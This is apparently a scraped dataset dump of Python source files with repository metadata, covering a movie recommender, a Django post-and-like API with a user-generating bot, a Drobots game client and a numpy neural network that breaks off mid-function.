"text": "import argparse\nimport random\nfrom CFModel import CFModel\nfrom recommender import *\n\n# Use the pre-trained model\ntrained_model = CFModel(max_userid, max_movieid, K_FACTORS)\n\n# Load weights\ntrained_model.load_weights('weights.h5')\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--user_id', type=int)\nparser.add_argument('--emo', type=int)\nargs = vars(parser.parse_args())\n\n# Pick a random test user\n# A random test user (user_id = 2000) # TODO: Test user for debugging\nTEST_USER = 2000\nemo = args[\"emo\"]\n\n# users[users['user_id'] == args[\"user_id\"]] # user specified\nusers[users['user_id'] == random.randint(1, 2000)] # random\n\n\n# Function to predict the ratings given User ID and Movie ID\ndef predict_rating(user_id, movie_id):\n return trained_model.rate(user_id - 1, movie_id - 1)\n\n\nuser_ratings = ratings[ratings['user_id'] == TEST_USER][['user_id',\n 'movie_id',\n 'rating']]\n\nuser_ratings['prediction'] = user_ratings\\\n .apply(lambda x: predict_rating(TEST_USER, x['movie_id']), axis=1)\n\nrecommendations = ratings[ratings['movie_id'].isin(user_ratings['movie_id']) == False][['movie_id']]\\\n .drop_duplicates()\n\nrecommendations['prediction'] = recommendations\\\n .apply(lambda x: predict_rating(TEST_USER, x['movie_id']), axis=1)\n\n# negative is 0 and positive is 1\nemo_map = {1: [\"Comedy\", \"Drama\", \"Fantasy\", \"Action\", \"Adventure\", \"Animation\", \"Children's\", \"Crime\", \"Documentary\",\n \"Horror\", \"Mystery\", \"Sci-Fi\"], 0: [\"Comedy\", \"Fantasy\", \"Thriller\", \"War\", \"Western\", \"Action\",\n \"Adventure\", \"Film-Noir\", \"Musical\", \"Romance\"]}\nsorted_recs = recommendations.\\\n sort_values(by='prediction', ascending=False).\\\n merge(movies,\n on='movie_id',\n how='inner',\n suffixes=['_u', '_m']).\\\n head(5)\n\n# print(type(sorted_recs))\n# print(sorted_recs)\n\nrecommended = set()\nfor genre in sorted_recs[\"genres\"]:\n gen = genre.split(\"|\")\n for g in gen:\n if g in emo_map[emo]:\n movie = sorted_recs[sorted_recs[\"genres\"] == genre][\"title\"]\n # print(list(movie))\n for x in list(movie):\n recommended.add(x[: x.index(\" (\")])\n\nprint(recommended)\n"
},
{
"alpha_fraction": 0.6864607930183411,
"alphanum_fraction": 0.6959620118141174,
"avg_line_length": 30.185184478759766,
"blob_id": "7644adca29dc1f288c4c8e36928713811bb78fd6",
"content_id": "497c6cf9cea20929399ede6f9ab9f451b1757563",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 842,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 27,
"path": "/backend/moodx/api/views.py",
"repo_name": "kamikazechaser/satrajit2_574b",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.views.generic import View\nfrom django.utils.decorators import method_decorator\nfrom django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\n\nfrom api.decorators.response import JsonResponseDecorator\nimport base64\nimport os\nimport time\n\n\n@method_decorator(JsonResponseDecorator, name='dispatch')\nclass SuggestView(View):\n def post(self, request):\n print(request.POST)\n image = request.POST.get('image')\n image = str(image)[22:]\n image = base64.b64decode(image)\n curr_time = time.time()\n save_path = os.path.join(settings.MEDIA_ROOT, f'image_{curr_time}.png')\n\n with open(save_path, 'wb+') as f:\n f.write(image)\n\n print(f'Received: {save_path}')\n return {'message': f'Uploaded {save_path}'}\n"
}
] | 2 |
jamlkht/Drobots | https://github.com/jamlkht/Drobots | ec979a6af8371c5b3acaa3aacab73b5561ee392b | 38f7626001147c51042efff84e9ee18ed40411e3 | 4810e29b4312d295e885ca8dfe43181ad3634579 | refs/heads/master | 2021-01-10T10:35:10.105583 | 2015-12-07T11:20:39 | 2015-12-07T11:20:39 | 47,546,477 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.541124165058136,
"alphanum_fraction": 0.5535090565681458,
"avg_line_length": 23.6015625,
"blob_id": "bebfedb0396934960dc95bf27ceb9e9946d5ae6c",
"content_id": "a29d49246a9fa71d224b99917241c02582699b61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3150,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 128,
"path": "/Player.py",
"repo_name": "jamlkht/Drobots",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python -u\n# -*- coding: utf-8 -*-\n\nimport sys\nimport Ice\nimport time\nfrom math import atan2, degrees, sqrt\nfrom random import randint\n\nIce.loadSlice('Drobots.ice')\nimport drobots\n\n\nclass Client(Ice.Application):\n def run(self, argv):\n broker = self.communicator()\n adapter = broker.createObjectAdapter(\"PlayerAdapter\")\n adapter.activate()\n servant = PlayerI(broker, adapter)\n\n player_prx = adapter.add(servant, broker.stringToIdentity(\"player1\"))\n print(str(player_prx))\n player = drobots.PlayerPrx.uncheckedCast(player_prx)\n\n game_prx = broker.stringToProxy(argv[1])\n print(str(game_prx))\n game = drobots.GamePrx.uncheckedCast(game_prx)\n\n nick = \"josen\" + str(randint(100, 999))\n\n if not game:\n raise RuntimeError('Invalid proxy')\n while 1:\n try:\n game.login(player, nick)\n break\n except drobots.GameInProgress:\n print(\"\\n Lo están usando tron, espera un poco\")\n time.sleep(2)\n except drobots.InvalidProxy:\n print(\"Proxy invalido\")\n except drobots.InvalidName:\n print(\"No vale ese nombre jefe\")\n\n self.shutdownOnInterrupt()\n broker.waitForShutdown()\n return 1\n\n\nclass PlayerI(drobots.Player):\n def __init__(self, broker, adapter):\n self.broker = broker\n self.adapter = adapter\n\n def makeController(self, robot, current=None):\n print(\"make Controller\")\n rb_servant = RobotController(robot)\n rb_proxy = self.adapter.add(rb_servant, self.broker.stringToIdentity(\"robotcontroller\"))\n robot_controller = drobots.RobotControllerPrx.uncheckedCast(rb_proxy)\n\n return robot_controller\n\n def win(self, current=None):\n print(\"DiooooH, Hemoh Ganao\")\n\n def lose(self, current=None):\n print(\"Foh, otra derrota\")\n\n\nclass RobotController(drobots.RobotController):\n\n def __init__(self, robot):\n self.robot = robot\n\n def turn(self, current=None):\n\n SCAN = 1\n MOVE = 2\n ATTACK = 3\n action = None\n sAngle = 0\n\n if action.equals(None):\n\n action = MOVE\n\n\n if action == MOVE:\n\n position = self.robot.location()\n print(position.y, position.x)\n deltax = 500 - position.x\n deltay = 500 - position.y\n hip = sqrt(deltax**2 + deltay**2)\n\n angle = int(degrees(atan2(deltay, deltax)))\n if hip >= 100:\n speed = 100\n else:\n speed = 0\n action = SCAN\n\n self.robot.drive(angle, speed)\n\n if action == SCAN:\n wide = 18\n\n while 1:\n print(self.robot.scan(sAngle, wide))\n\n if (self.robot.scan(sAngle, wide)) == 1:\n\n action = ATTACK\n break\n else:\n sAngle += wide\n\n if action == ATTACK:\n self.robot.cannon(sAngle, 90)\n\n\n\n\n\n\n\nclient = Client()\nsys.exit(client.main(sys.argv))\n"
}
] | 1 |
maksymkv25/starnavi | https://github.com/maksymkv25/starnavi | 3f27161e28a0883dae06bcd94260767d0f68cf4c | f78a411924b81e96831a2aab605810cd831e8035 | d5df18d77e1c7d15046fa7014a083d5927a3ee2a | refs/heads/master | 2020-03-27T15:27:03.280267 | 2018-09-07T08:36:37 | 2018-09-07T08:36:37 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6551321744918823,
"alphanum_fraction": 0.6683514714241028,
"avg_line_length": 33.75675582885742,
"blob_id": "ee7ff58efba332770a93ee19f273230104f42481",
"content_id": "952ae14618982c10be03e99527cbc5fbff7724d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2572,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 74,
"path": "/app/post/views.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom rest_framework import permissions\nfrom rest_framework.generics import CreateAPIView, RetrieveAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import(\n HTTP_200_OK,\n HTTP_400_BAD_REQUEST,\n HTTP_404_NOT_FOUND\n)\nfrom rest_framework.views import APIView\nfrom .serializers import (\n PostCreationSerializer,\n PostLikeSerializer\n)\nfrom .models import Post\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass PostCreationAPIView(CreateAPIView):\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = PostCreationSerializer\n\n def post(self, request, *args, **kwargs):\n data = request.data\n serializer = PostCreationSerializer(data=data,\n context={'request': request})\n if serializer.is_valid(raise_exception=True):\n new_data = serializer.data\n return Response(new_data, status=HTTP_200_OK)\n return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass PostLikeAPIView(RetrieveAPIView):\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = PostLikeSerializer\n\n def get_object(self, id):\n try:\n return Post.objects.get(id=id)\n except Post.DoesNotExist:\n return None\n\n def get(self, request, id):\n post = self.get_object(int(id))\n if not post:\n return Response({'error': 'There is no such post.'}, status=HTTP_404_NOT_FOUND)\n post.like += 1\n post.save()\n return Response({'success': True, 'likes': post.like}, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass PostUnlikeAPIView(RetrieveAPIView):\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = PostLikeSerializer\n\n def get_object(self, id):\n try:\n return Post.objects.get(id=id)\n except Post.DoesNotExist:\n return None\n\n def get(self, request, id):\n post = self.get_object(int(id))\n if not post:\n return Response({'error': 'There is no such post.'}, status=HTTP_404_NOT_FOUND)\n if post.like == 0 or post.like <= 0:\n return Response({'error': 'You can not reduce the value.'}, status=HTTP_200_OK)\n post.like -= 1\n post.save()\n return Response({'likes': post.like}, status=HTTP_200_OK)\n"
},
{
"alpha_fraction": 0.717391312122345,
"alphanum_fraction": 0.717391312122345,
"avg_line_length": 25.83333396911621,
"blob_id": "b5525f5a218fa0c47ba38a0f6be5e0fdefbcb877",
"content_id": "1900aaae9140f890d8b125a7cf76a17efc09b318",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 12,
"path": "/app/accounts/urls.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.views.decorators.csrf import csrf_exempt\nfrom django.urls import path\nfrom .views import (\n UserLoginAPIView,\n UserSignupAPIView,\n)\n\n\nurlpatterns = [\n path('signup/', csrf_exempt(UserSignupAPIView.as_view()), name='Signup'),\n path('login/', csrf_exempt(UserLoginAPIView.as_view()), name='Login')\n]\n"
},
{
"alpha_fraction": 0.6460674405097961,
"alphanum_fraction": 0.6573033928871155,
"avg_line_length": 26.384614944458008,
"blob_id": "91c290dd148dcd014dbb62c1b1cd6dada63e0d66",
"content_id": "f99bea588d271d20f3994810b9a19018f1faa459",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 356,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 13,
"path": "/app/post/urls.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.urls import re_path, path\nfrom .views import (\n PostCreationAPIView,\n PostLikeAPIView,\n PostUnlikeAPIView\n)\n\n\nurlpatterns = [\n path('create/', PostCreationAPIView.as_view(), name='Post create'),\n re_path(r'^(?P<id>[0-9]+)/like$', PostLikeAPIView.as_view()),\n re_path(r'^(?P<id>[0-9]+)/unlike$', PostUnlikeAPIView.as_view())\n]\n"
},
{
"alpha_fraction": 0.7445054650306702,
"alphanum_fraction": 0.7582417726516724,
"avg_line_length": 35.400001525878906,
"blob_id": "69ca25b34715d49eb23610ab59d5b9663a520b32",
"content_id": "277a6439bfcfe34e9ade2efef09d6baad5c58319",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 10,
"path": "/app/post/models.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\n\n\nclass Post(models.Model):\n owner = models.ForeignKey(User, on_delete=models.CASCADE)\n created = models.DateTimeField(auto_now_add=True)\n like = models.BigIntegerField(default=0)\n text = models.TextField(max_length=1000, blank=True, default='')\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 22.33333396911621,
"blob_id": "865c38f447cb5700c484172e5119996b7a735c4d",
"content_id": "44d08396938da23c12e3c3cb2b18dddd06296e9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/bot/config.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "number_of_users = 10\nmax_posts_per_user = 100\nmax_like_per_user = 500\n"
},
{
"alpha_fraction": 0.7863247990608215,
"alphanum_fraction": 0.7863247990608215,
"avg_line_length": 22.399999618530273,
"blob_id": "de7ac967cb898caa9e331aac5d748eb085c97a15",
"content_id": "a1eb75b39c49c99b6ab6084216ebf69b58ce12d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 5,
"path": "/README.md",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "# starnavi\nTechnical task\n\n\nSettings file saved in git for example. Add API keys of clearbit and hunter in settings.\n"
},
{
"alpha_fraction": 0.6863882541656494,
"alphanum_fraction": 0.6945089101791382,
"avg_line_length": 30.536584854125977,
"blob_id": "a9a06849a44189c485e9a17338e4555a8ca33173",
"content_id": "76efa895f36557f9c2da1f64cb70c31f15a3c651",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2586,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 82,
"path": "/app/accounts/views.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "import clearbit\nimport requests\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import (\n HTTP_400_BAD_REQUEST,\n HTTP_404_NOT_FOUND,\n HTTP_200_OK,\n HTTP_201_CREATED\n)\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny\nfrom .serializers import (\n UserSignupSerializer,\n UserLoginSerializer\n)\nfrom starnavi.settings import clearbit_key, hunter_key, hunter_api\n\n\nclearbit.key = clearbit_key\n\n\ndef get_additional_data_about_user(email):\n \"\"\"\n Additional data for the user on signup using Clearbit service.\n \"\"\"\n\n person = clearbit.Person.find(email=email, stream=True)\n if person != None:\n return person\n else:\n return False\n\n\ndef verify_existence_email(email):\n \"\"\"\n Verifying email existence on signup.\n \"\"\"\n\n data = 'email-verifier?email=%s&api_key=%s' % (email, hunter_key)\n url = hunter_api + data\n resp = requests.get(url=url)\n response = resp.json()\n if 'data' in response or 'meta' in response:\n # Successful response\n # If need additional information about email verifying see response\n return True\n else:\n # Error response\n return False\n\n\nclass UserSignupAPIView(CreateAPIView):\n permission_classes = [AllowAny]\n serializer_class = UserSignupSerializer\n queryset = User.objects.all()\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass UserLoginAPIView(APIView):\n permission_classes = [AllowAny]\n serializer_class = UserLoginSerializer\n\n def post(self, request, *args, **kwargs):\n data = request.data\n username = data.get('username')\n password = data.get('password')\n serializer = UserLoginSerializer(data=data)\n if serializer.is_valid(raise_exception=True):\n user = authenticate(username=username, password=password)\n if not user:\n return Response({'error': 'Invalid Credentials'},\n status=HTTP_404_NOT_FOUND)\n token, _ = Token.objects.get_or_create(user=user)\n return Response({'token': token.key}, status=HTTP_200_OK)\n return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)\n"
},
{
"alpha_fraction": 0.6093906164169312,
"alphanum_fraction": 0.6093906164169312,
"avg_line_length": 21.244443893432617,
"blob_id": "d17bd377c947d3fbbadf8488da856c3f1c3540cf",
"content_id": "75841b5538a3047cad9f6c6577962d6863fea4ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1001,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 45,
"path": "/app/post/serializers.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom post.models import Post\nfrom rest_framework.serializers import (\n CharField,\n Field,\n ModelSerializer,\n SerializerMethodField,\n ValidationError,\n IntegerField\n)\n\n\nclass PostCreationSerializer(ModelSerializer):\n text = CharField(required=True, allow_blank=True)\n\n class Meta:\n model = Post\n fields = (\n 'id',\n 'text',\n )\n\n def validate(self, data):\n user = self.context['request'].user\n text = data.get('text', None)\n if not text:\n raise ValidationError('Text field is required.')\n post = Post.objects.create(owner=user, text=text)\n data.update({'id': post.id})\n return data\n\n\nclass PostLikeSerializer(ModelSerializer):\n like = IntegerField()\n\n class Meta:\n model = Post\n fields = {\n 'like'\n }\n def validate(self, data):\n pass\n\nclass PostUnlikeSerializer(ModelSerializer):\n pass\n"
},
{
"alpha_fraction": 0.5638183951377869,
"alphanum_fraction": 0.5652484893798828,
"avg_line_length": 27.835052490234375,
"blob_id": "f63520b552f0ad2cc3c3892ddd7e0d18cd728e8e",
"content_id": "f888c611e13e7fb593ecbbb895f458a56136282a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2797,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 97,
"path": "/app/accounts/serializers.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "import time\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import (\n CharField,\n EmailField,\n ModelSerializer,\n ValidationError\n)\nfrom rest_framework.status import HTTP_201_CREATED\n\n\nclass UserSignupSerializer(ModelSerializer):\n class Meta:\n model = User\n fields = (\n 'email',\n 'username',\n 'password'\n )\n extra_kwargs = {\n 'password':\n {'write_only': True}\n }\n\n def create(self, validated_data, verify=None, person_info=None):\n \"\"\"\n If need to verify email address pass verify parameter as True.\n \"\"\"\n # Avoid circular dependencies\n from accounts.views import (\n get_additional_data_about_user,\n verify_existence_email\n )\n\n username = validated_data['username']\n email = validated_data['email']\n\n if verify:\n if verify_existence_email(email):\n pass\n else:\n raise ValidationError('Email address not verifying.')\n\n if person_info:\n user_information = get_additional_data_about_user(email)\n if user_information is False:\n pass\n else:\n # TODO\n # Save additional information abou user\n pass\n\n # Checkin\n password = validated_data['password']\n user_obj = User(\n username = username,\n email = email\n )\n user_obj.set_password(password)\n user_obj.save()\n token = Token.objects.create(user=user_obj)\n return validated_data\n\n\nclass UserLoginSerializer(ModelSerializer):\n username = CharField(required=False, allow_blank=True)\n\n class Meta:\n model = User\n fields = (\n 'username',\n 'password',\n )\n extra_kwargs = {\n 'password':\n {'write_only': True}\n }\n\n def validate(self, data):\n user_obj = None\n username = data.get('username', None)\n password = data['password']\n if not username:\n raise ValidationError(\"A username and email is required to login.\")\n user = User.objects.filter(Q(username=username)).distinct()\n if user.exists() and user.count() == 1:\n user_obj = user.first()\n else:\n raise ValidationError(\"This user or email is not valid.\")\n if user_obj:\n if not user_obj.check_password(password):\n raise ValidationError(\"Incorrect credentials, please try again.\")\n user_id = user_obj.id\n return data\n"
},
{
"alpha_fraction": 0.5680047869682312,
"alphanum_fraction": 0.5763930678367615,
"avg_line_length": 31.096153259277344,
"blob_id": "3e6cb1ae74723bc81249450cf280b0f332bf2a75",
"content_id": "0e2ef54960a9ec59f09a13e14bccdd7c6f82cc94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3338,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 104,
"path": "/bot/automated_bot.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "import string\nimport random\nimport requests\nfrom config import (\n number_of_users,\n max_posts_per_user,\n max_like_per_user\n)\n\nurl = 'http://127.0.0.1:8000/api/'\nemail_domain = 'gmail.com'\n\nclass GenerateUserData:\n \"\"\"\n Generating user data for bot application.\n \"\"\"\n\n def generate_chars(self, start, stop):\n random_chars = ''.join(random.sample(string.ascii_letters,\n random.randint(start, stop)))\n return random_chars\n\n def generate_email(self):\n user_email = '%s@%s' % (self.generate_chars(4, 12), email_domain)\n return user_email\n\n def generate_username(self):\n username = self.generate_chars(4, 10)\n return username\n\n def _generate_password(self):\n password = self.generate_chars(8, 10)\n return password\n\n def generate_post_text(self):\n text = ''.join([random.choice(string.printable) for _ in range(500)])\n return text\n\n\nclass Bot:\n \"\"\"\n Automated bot for user registration, post creation and post liked.\n \"\"\"\n\n def __init__(self, number_of_users, max_posts_per_user, max_like_per_user):\n self.users_count = number_of_users\n self.max_posts = max_posts_per_user\n self.max_likes = max_like_per_user\n\n def user_signup(self):\n url_method = url + 'user/signup/'\n _password = GenerateUserData()._generate_password()\n data = {\n 'email': GenerateUserData().generate_email(),\n 'username': GenerateUserData().generate_username(),\n 'password': _password\n }\n resp = requests.post(url=url_method, data=data)\n return resp.json().get('username'), _password\n\n\n def user_login(self, username, _password):\n url_method = url + 'user/login/'\n data = {\n 'username': username,\n 'password': _password\n }\n resp = requests.post(url=url_method, data=data)\n _token = resp.json().get('token')\n return _token\n\n def create_post(self, _token):\n url_method = url + 'post/create/'\n data = {'text': GenerateUserData().generate_post_text()}\n headers = {'Authorization': 'Token %s' % _token}\n resp = requests.post(url=url_method, data=data, headers=headers)\n post_id = resp.json().get('id')\n return post_id\n\n def liked_post(self, _token, post_id):\n url_method = url + 'post/%d/like' % post_id\n headers = {'Authorization': 'Token %s' % _token}\n resp = requests.get(url=url_method, headers=headers)\n\n def start_bot(self):\n\n for _ in range(self.users_count):\n username, _password = self.user_signup()\n _token = self.user_login(username, _password)\n count_of_posts = random.randint(1, self.max_posts)\n count_of_likes = random.randint(1, self.max_likes)\n all_posts = []\n while count_of_posts != 0:\n post_id = self.create_post(_token)\n all_posts.append(post_id)\n count_of_posts -= 1\n while count_of_likes != 0:\n random_post = random.choice(all_posts)\n self.liked_post(_token, random_post)\n count_of_likes -= 1\n\n\nif __name__ == \"__main__\":\n Bot(number_of_users, max_posts_per_user, max_like_per_user).start_bot()\n"
}
] | 10 |
laurelr2020/mad-libs-generator | https://github.com/laurelr2020/mad-libs-generator | 3d1f393fd066deadccb704641a9d48a1bb621bd8 | dd264451870d6392c6851fcdbc852b7174c11348 | 6a46aa962d5001846ad5167ba6488677f6863e97 | refs/heads/master | 2020-07-09T05:03:20.839438 | 2019-08-25T02:56:04 | 2019-08-25T02:56:04 | 203,886,525 | 0 | 0 | null | 2019-08-22T23:09:23 | 2019-08-23T01:38:19 | 2019-08-25T02:56:04 | Python | [
{
"alpha_fraction": 0.6403647661209106,
"alphanum_fraction": 0.6582077741622925,
"avg_line_length": 39.67741775512695,
"blob_id": "f0275492d1932bd3138266ff88ac332d27862706",
"content_id": "dcadeac6109264c07cae0431efc53dc81444b309",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2522,
"license_type": "no_license",
"max_line_length": 329,
"num_lines": 62,
"path": "/mad-libs.py",
"repo_name": "laurelr2020/mad-libs-generator",
"src_encoding": "UTF-8",
"text": "from os import system\ndef promptBeginning():\n answer = input(\"Would you like to do a Mad Lib? (yes/no) \")\n\n if answer == \"yes\":\n generateMadLib()\n elif answer == \"no\":\n print(\"okay...byee\")\n else:\n print(\"not a valid input\")\n\ndef generateMadLib():\n print(\"\\n******* Welcome ********\")\n print(\"You will be prompted for different types of words from the English language.\")\n print(\"Enter a word for each prompt and at then end you will have a story.\")\n print(\"\\n\")\n\n sillyName = input(\"Silly Name: \")\n unrealisticProfession = input(\"Unrealistic Profession: \")\n country = input(\"Country: \")\n sillyName2 = input(\"Another Silly Name: \")\n color = input(\"Color: \")\n adjective = input(\"Adjective: \")\n adverb = input(\"Adverb: \")\n sillyName3 = input(\"Third Silly Name: \")\n sillyName4 = input(\"Fourth Silly Name: \")\n facialFeature = input(\"Facial Feature: \")\n city = input(\"US City: \")\n sillyName5 = input(\"Fifth Silly Name: \")\n verb = input(\"Verb ending in -ing: \")\n noun = input(\"Noun: \")\n actor = input(\"Actor: \")\n noun2 = input(\"Noun: \")\n\n madLibList = [sillyName, unrealisticProfession, country, sillyName2, color, adjective, adverb, sillyName3, sillyName4, facialFeature, city, sillyName5, verb, noun, actor, noun2]\n populateMadLib(madLibList)\n\ndef populateMadLib(inputs):\n madLib0 = \"Meet our hero {}, a super intelligent {}.\".format(inputs[0], inputs[1])\n printAndSpeak(madLib0)\n\n madLib1 = \"A run-in with the military of {} leads him to create his alter-ego, {}, a {}, {} giant, capable of great destruction.\".format(inputs[2], inputs[3], inputs[4], inputs[5])\n printAndSpeak(madLib1)\n\n madLib2 = \"He {} battles the military with his girlfriend {}.\".format(inputs[6], inputs[7])\n printAndSpeak(madLib2)\n\n madLib3 = \"Eventually it is discovered that long-time colleague of our hero, {}, distinguished by his {}, is trying to turn {} into a weapon, leading to a climatic, if pointless, battle in downtown {} with an evil version of the same giant alter-ego called {}.\".format(inputs[8], inputs[9], inputs[3], inputs[10], inputs[11])\n printAndSpeak(madLib3)\n\n madLib4 = \"Eventually the enemy is subdued by {} him with a {}.\".format(inputs[12], inputs[13])\n printAndSpeak(madLib4)\n\n madLib5 = \"In the final reel, {} joins him in a {}.\".format(inputs[14], inputs[15])\n printAndSpeak(madLib5)\n\n\ndef printAndSpeak(sentence):\n print(sentence)\n system(\"say \" + sentence)\n\npromptBeginning()\n"
}
] | 1 |
ksmaybe/Project-2-Handwiriting-Neural-Network | https://github.com/ksmaybe/Project-2-Handwiriting-Neural-Network | ac9f5ee726949f840d5c85e330c622b09aac6667 | 4628e3846ff7d0fa7c63d5409eeae15a0bbc41f4 | fdf86b5edfccb4efffec83023229c5b2e526b21e | refs/heads/master | 2020-04-09T20:49:09.732185 | 2019-01-17T13:39:43 | 2019-01-17T13:39:43 | 160,585,052 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5253061652183533,
"alphanum_fraction": 0.5394717454910278,
"avg_line_length": 23.02836799621582,
"blob_id": "a35cbc6f046d597220dfecc346253a949429e31e",
"content_id": "ed363715fb245fcc648ffdcb179a77032fb81460",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6777,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 282,
"path": "/neural network.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "import struct\n\nimport numpy as np\nimport cv2\nimport math\nimport os\nfrom numba import vectorize\n\nnp.random.seed(0)\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\ndef sigmoid_derivative(x):\n return x*(1-x)\n\nclass Connection:\n def __init__(self, con_neuron):\n self.con_neuron=con_neuron\n self.weight=np.random.normal()\n self.d_weight = 0.0\n\n\nclass Neuron:\n E=0.001\n A=0.01\n\n def __init__(self,layer):\n self.connectors=[]\n self.error=0.0\n self.gradient=0.0\n self.output=0.0\n if layer is None:\n pass\n else:\n for neuron in layer:\n con=Connection(neuron)\n self.connectors.append(con)\n\n def add_error(self,error):\n self.error+=error\n\n def set_error(self,error):\n self.error=error\n\n def set_output(self,output):\n self.output=output\n\n def get_output(self):\n return self.output\n\n def feed_forward(self):\n sum=0\n if len(self.connectors)!=0:\n x=[None]*len(self.connectors)\n y=[None]*len(self.connectors)\n i=0\n for con in self.connectors:\n x[i]=con.con_neuron.output\n y[i]=con.weight\n\n i+=1\n x=np.array(x)\n y=np.array(y)\n sum=np.dot(x,y)\n self.output=sigmoid(sum)\n xx=0\n else:\n self.output=0.5\n\n\n def back_propagate(self):\n self.gradient=self.error*sigmoid_derivative(self.output)\n l=len(self.connectors)\n x=[None]*l\n y=[None]*l\n z=[None]*l\n w=[None]*l\n cons=self.connectors\n for con in self.connectors:\n # x[i]=con[i].con_neuron.output\n # y[i]=con[i].d_weight\n # z[i]=con[i].con_neuron.error\n # w[i]=con[i].weight\n # x=np.array(x)\n # y=np.array(y)\n # z=np.array(z)\n # w=np.array(w)\n # for i in range(l):\n # y[i]=self.E*(x[i]*self.gradient)+self.A*y[i]\n # w[i]=w[i]+y[i]\n # z[i]=z[i]+(w[i]*self.gradient)\n\n\n # aa=self.E*x*self.gradient\n # bb=self.A*y\n # y=aa+bb\n # w=w+y\n # z=z+(w*self.gradient)\n con.d_weight=self.E*(con.con_neuron.output*self.gradient)+self.A*con.d_weight\n con.weight+=con.d_weight\n con.con_neuron.add_error(con.weight*self.gradient)\n\n\n self.error=0\n\nclass N_Network:\n def __init__(self,set):\n self.layer_list=[]\n for n in set:\n layer=[]\n for i in range(n):\n if len(self.layer_list)==0:\n layer.append(Neuron(None))\n else:\n layer.append(Neuron(self.layer_list[-1]))\n layer.append(Neuron(None))\n last_neuron=layer[-1]\n last_neuron.set_output(1)\n self.layer_list.append(layer)\n\n def set_input(self,input_list):\n for i in range(len(input_list)):\n self.layer_list[0][i].set_output(input_list[i])\n\n def get_error(self,y):\n error=0\n zz=[None]*len(y)\n for i in range(len(y)):\n\n 